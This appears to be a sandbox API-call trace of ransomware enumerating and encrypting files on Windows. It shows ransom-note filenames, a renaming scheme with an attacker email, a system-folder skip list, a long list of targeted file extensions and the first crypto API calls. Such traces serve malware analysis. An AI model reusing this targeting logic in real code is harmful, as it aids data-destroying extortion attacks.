	[0174.447] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0174.447] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x817c4737, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8181100e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0174.456] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0174.456] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81778126, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81778126, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8179ecfa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x8b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0174.456] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8181100e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8181100e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8181100e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0174.457] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817c4737, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x817c4737, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x817eaa1d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0174.457] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817c4737, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x817c4737, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x817c4737, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0174.457] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0174.457] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0174.457] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0174.457] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}"
	[0174.457] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\"
	[0174.457] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov"
	[0174.457] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov"
	[0174.458] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\"
	[0174.458] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\"
	[0174.458] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*.*"
	[0174.458] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0174.458] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*.*") returned 89
	[0174.459] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.459] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*") returned 0x59
	[0174.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.459] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0174.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.459] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0174.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0174.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0174.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.460] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0174.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.461] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.461] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0174.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.461] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0174.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.462] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0174.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.462] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0174.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.462] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0174.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.462] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.463] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.463] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0174.463] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.463] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0174.464] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.464] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0174.464] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.464] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0174.464] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.464] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0174.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.465] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0174.465] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="..", cAlternateFileName="")) returned 1
	[0174.465] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0174.465] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0d08f31, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0d08f31, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d2f19c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0174.465] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0174.465] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0174.465] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\"
	[0174.466] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml"
	[0174.466] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml") returned 97
	[0174.466] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.466] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml") returned 0x61
	[0174.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.466] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0174.466] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml"
	[0174.466] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml") returned 97
	[0174.467] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.467] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.467] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0174.467] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.467] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0174.467] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.468] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.468] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.469] ReadFile (in: hFile=0x39c, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x15c, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x189930*=0x15c, lpOverlapped=0x0) returned 1
	[0174.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.472] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb198) returned 1
	[0174.475] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.475] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
